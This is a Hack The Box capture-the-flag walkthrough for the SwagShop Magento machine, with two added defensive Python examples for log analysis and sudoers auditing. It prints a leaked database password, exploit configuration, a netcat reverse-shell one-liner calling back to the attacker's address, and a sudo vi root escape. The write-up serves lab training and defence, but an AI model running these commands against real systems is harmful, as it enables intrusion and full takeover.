Hack The Box - SwagShop
The target IP is 10.10.10.140:
nmap -p- -Pn -sV -sC -T4 10.10.10.140
Nmap scan report for 10.10.10.140
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Did not follow redirect to http://swagshop.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 485.25 seconds
Port 22 has a username enumeration vulnerability, but I don't want to exploit it:
searchsploit OpenSSH
OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
Visiting port 80 gives me the following page:
Wappalyzer did a nice job of enumerating the general information about the target web page for me: a Magento web application running on PHP. In the bottom right corner there is an input box suggesting I enter my email to subscribe, and the footer tells me the site's date, 2014:
I tried clicking the buttons the page offers and noticed the URL pattern they redirect to:
http://swagshop.htb/index.php/customer/account/login/
http://swagshop.htb/index.php/5-x-hack-the-box-square-sticker.html?SID=rbc125sp335vg3tsv1qioob711
No matter which button I click, the path is under index.php. Then I found a login form:
But it doesn't look like the one administrators use. I tried searching for Magento-related vulnerabilities and found many, but I didn't have the specific version number of the target's Magento installation. I tried brute-forcing paths:
[16:57:21] Starting:
[16:57:33] 200 - 10KB - /LICENSE.txt
[16:57:44] 200 - 571KB - /RELEASE_NOTES.txt
[16:57:48] 200 - 37B - /api.php
[16:57:48] 301 - 310B - /app -> http://swagshop.htb/app/
[16:57:48] 200 - 2KB - /app/
[16:57:48] 403 - 300B - /app/.htaccess
[16:57:48] 200 - 5KB - /app/etc/config.xml
[16:57:48] 200 - 2KB - /app/etc/local.xml
[16:57:48] 200 - 9KB - /app/etc/local.xml.additional
[16:57:48] 200 - 2KB - /app/etc/local.xml.template
[16:57:53] 200 - 717B - /cron.sh
[16:57:53] 200 - 0B - /cron.php
[16:57:57] 200 - 2KB - /errors/
[16:57:57] 301 - 313B - /errors -> http://swagshop.htb/errors/
[16:57:58] 200 - 1KB - /favicon.ico
[16:58:01] 200 - 946B - /includes/
[16:58:01] 301 - 315B - /includes -> http://swagshop.htb/includes/
[16:58:01] 200 - 16KB - /index.php
[16:58:01] 200 - 44B - /install.php
[16:58:02] 301 - 309B - /js -> http://swagshop.htb/js/
[16:58:02] 301 - 318B - /js/tiny_mce -> http://swagshop.htb/js/tiny_mce/
[16:58:02] 200 - 4KB - /js/tiny_mce/
[16:58:03] 200 - 3KB - /lib/
[16:58:03] 301 - 310B - /lib -> http://swagshop.htb/lib/
[16:58:06] 200 - 2KB - /media/
[16:58:06] 301 - 312B - /media -> http://swagshop.htb/media/
[16:58:10] 200 - 886B - /php.ini.sample
[16:58:12] 301 - 314B - /pkginfo -> http://swagshop.htb/pkginfo/
[16:58:15] 403 - 300B - /server-status
[16:58:15] 403 - 301B - /server-status/
[16:58:16] 301 - 312B - /shell -> http://swagshop.htb/shell/
[16:58:16] 200 - 2KB - /shell/
[16:58:16] 301 - 311B - /skin -> http://swagshop.htb/skin/
[16:58:22] 301 - 310B - /var -> http://swagshop.htb/var/
[16:58:22] 200 - 2KB - /var/
[16:58:22] 200 - 755B - /var/backups/
[16:58:22] 200 - 4KB - /var/cache/
[16:58:22] 200 - 9KB - /var/package/
I found its configuration file, which contains something that looks like a specific version number:
http://swagshop.htb/app/code/community/Phoenix/Moneybookers/etc/config.xml
<version>1.6.0.0</version>
I also found another XML file; its date is somewhat different, and there is a strange key:
http://swagshop.htb/app/etc/local.xml
<config>
<date>Wed, 08 May 2019 07:23:09 +0000</date>
<key>b355a9e0cd018d3f7f03607141518419</key>
I also seem to see the password of the MySQL root user, but the target hasn't opened the database port for me to connect remotely:
<host>localhost</host>
<username>root</username>
<password>fMVWh7bDHpgZkyfqQXreTjU9</password>
<dbname>swagshop</dbname>
<initStatements>SET NAMES utf8</initStatements>
<model>mysql4</model>
<type>pdo_mysql</type>
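From the defender's side, the two things worth catching in the steps above are the forced browsing itself and the fact that app/etc/local.xml was served with a 200 even though app/.htaccess answered 403 (a sign the directory's deny rule is not being honoured). The Python below is an added example, not code from this writeup: it runs that detection over constructed Apache access-log lines, flagging clients with an unusual number of 404s and any 200 for Magento 1 paths that should never be reachable. The log lines, the path list and the 404 threshold are assumptions.

```python
import re
from collections import Counter

# Apache combined-log line: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Magento 1 paths from the dirsearch output above that must never return 200:
# local.xml holds the DB password and crypt key, var/backups and var/package can
# hold DB dumps and extension archives, install.php should be gone after setup.
SENSITIVE_PATHS = {
    "/app/etc/local.xml", "/app/etc/local.xml.additional", "/app/etc/config.xml",
    "/var/backups/", "/var/package/", "/install.php", "/php.ini.sample",
}

def analyse(lines, max_404_per_ip=20):
    """Return (exposed, scanners): (ip, path) pairs where a sensitive path was
    served with 200, and IPs whose 404 count exceeds the forced-browsing threshold."""
    exposed, not_found = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]  # drop query string (e.g. ?SID=...)
        status = int(m.group("status"))
        if status == 404:
            not_found[m.group("ip")] += 1
        elif status == 200 and path in SENSITIVE_PATHS:
            exposed.append((m.group("ip"), path))
    scanners = [ip for ip, n in not_found.items() if n > max_404_per_ip]
    return exposed, scanners

# Constructed sample log (assumption): 25 misses from one client, then two real
# leaks, one blocked .htaccess probe and one ordinary visitor.
SAMPLE = [
    f'10.10.16.3 - - [08/May/2019:16:57:{30 + i % 30:02d} +0000] '
    f'"GET /guess{i} HTTP/1.1" 404 275' for i in range(25)
] + [
    '10.10.16.3 - - [08/May/2019:16:57:48 +0000] "GET /app/etc/local.xml HTTP/1.1" 200 2048',
    '10.10.16.3 - - [08/May/2019:16:58:22 +0000] "GET /var/backups/ HTTP/1.1" 200 755',
    '10.10.16.3 - - [08/May/2019:16:57:48 +0000] "GET /app/.htaccess HTTP/1.1" 403 300',
    '192.0.2.7 - - [08/May/2019:17:01:02 +0000] "GET /index.php/customer/account/login/ HTTP/1.1" 200 16384',
]
```

Calling analyse(SAMPLE) reports the scanning client and the two leaked paths; a 200 on any of these paths is the finding to act on (deny the app/ and var/ directories at the web server level), the 404 burst is only the early warning.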
Maybe I can try it over SSH; unsurprisingly, it doesn't work:
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.140' (ED25519) to the list of known hosts.
root@10.10.10.140's password:
Permission denied, please try again.
root@10.10.10.140's password:
There is also a script that looks like a scheduled task, cron.sh, but sorry, it's empty. There is also its install script:
http://swagshop.htb/install.php
I also found some things like this:
After browsing around a bit I had gathered quite a lot, including a page that looks like the target's admin login, but it shows another date, 2022:
http://swagshop.htb/index.php/admin/
I want to look for publicly disclosed vulnerabilities first:
searchsploit Magento
--------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection |
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denia |
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username |
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.p |
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting |
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File |
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution |
Magento eCommerce - Local File Disclosure |
Magento eCommerce - Remote Code Execution |
Magento Server MAGMI Plugin - Multiple Vulnerabilities |
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion |
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypa |
--------------------------------------------------------------------------- ---------
The most tempting one is always remote code execution:
Magento eCommerce - Remote Code Execution
This Magento eCommerce - Remote Code Execution exploit creates a new admin account with forme/forme as the credentials. I only need to change the target and run it to get an admin account. Here is its exploit script; the one from searchsploit also works, of course, but you have to modify it yourself:
https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
The vulnerability is actually just a SQL injection:
Just like that, I got access to the target's admin backend:
Next I need to use another vulnerability for remote code execution,
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
The exploit script provided by searchsploit throws some errors. My development skills are quite poor and I couldn't understand it, but many writeups online say it worked straight away; maybe something was updated and the era is different. I spent a lot of time finding the following article, which ran into the same problem I did, but it analyzes the causes in detail and resolves the issue. Check it out if you need to:
https://dtwh.medium.com/hack-the-box-swagshop-walkthrough-without-metasploit-8b9f03c480e7
After getting the exploit script, some of its internal parameter values need to be changed:
# Config.
username = 'try'  # username
password = 'again'  # password
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # date; this needs to be the exact date from /app/etc/local.xml
The date can be obtained from the target page with the following command:
curl -s 10.10.10.140/app/etc/local.xml | grep date
<date>Wed, 08 May 2019 07:23:09 +0000</date>
Then I can run the following command to make the target establish a reverse shell:
python2 poc.py 'http://10.10.10.140/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.3 1337 >/tmp/f"
Listen on the corresponding port on the other side:
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.140] 45610
sh: 0: can't access tty; job control turned off
$ whoami
www-data
Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l told me something useful:
www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
And the editor can drop into a shell as the current identity, so I can use the following command to get a root shell:
sudo /usr/bin/vi /var/www/html/api.php -c ':!/bin/sh' /dev/null
"/var/www/html/api.php" 88L, 2834C
:!/bin/sh
# whoami
whoami
root
#
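That single sudo rule is the whole privilege-escalation path, so the defender's check is to audit sudoers for exactly this pattern: an interactive editor, run as root, with no password and a wildcard argument. The Python below is an added example, not code from this writeup: it parses the rule lines printed by `sudo -l` and reports each of those properties. The binary list is a starting point rather than a complete catalogue, and the sample output is constructed.

```python
import re

# Binaries with a documented way to spawn a shell once they run as root
# (editors, pagers, interpreters, archivers). Assumed starting list, not exhaustive.
SHELL_ESCAPE_BINARIES = {
    "vi", "vim", "view", "nano", "less", "more", "man", "awk", "perl", "python",
    "python3", "find", "env", "bash", "sh", "tar", "zip", "git", "ftp",
}

# One rule as printed by sudo -l: (runas) [TAG: ...] command [args]
RULE_RE = re.compile(r'^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$')

def audit_sudo_rule(rule):
    """Return a list of findings for one rule line; empty means nothing flagged."""
    m = RULE_RE.match(rule.strip())
    if not m:
        return ["unparseable rule: " + rule]
    runas = m.group("runas").split(":")[0].strip()          # "(ALL : ALL)" -> "ALL"
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmd = m.group("cmd").strip()
    binary = cmd.split()[0].rsplit("/", 1)[-1]               # "/usr/bin/vi" -> "vi"
    findings = []
    if cmd == "ALL":
        findings.append("unrestricted command")
    elif binary in SHELL_ESCAPE_BINARIES:
        findings.append(f"{binary} can spawn a shell as {runas}")
    if "NOPASSWD" in tags:
        findings.append("no password required")
    if "*" in cmd:
        findings.append("wildcard argument")
    return findings

def audit_sudo_l(output):
    """Audit every rule in the output of `sudo -l`; returns {rule: findings}."""
    results, in_rules = {}, False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules and line.strip().startswith("("):
            results[line.strip()] = audit_sudo_rule(line)
    return results

# Constructed sample: the rule from this box plus a harmless log-reading rule.
SAMPLE_SUDO_L = """User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) /bin/cat /var/log/apache2/access.log
"""
```

A rule that collects all three findings, as the vi rule does, should be replaced by a non-interactive command with fixed arguments; sudo's own `sudoedit` at least keeps the editor running as the calling user.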
user.txt:
root@swagshop:/home/haris# cat user.txt
cat user.txt
a4.............................
root.txt:
root@swagshop:~# cat root.txt
cat root.txt
c2b087.........................
___ ___
/| |/|\| |\
/_| ´ |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password
PS: Use root flag as password!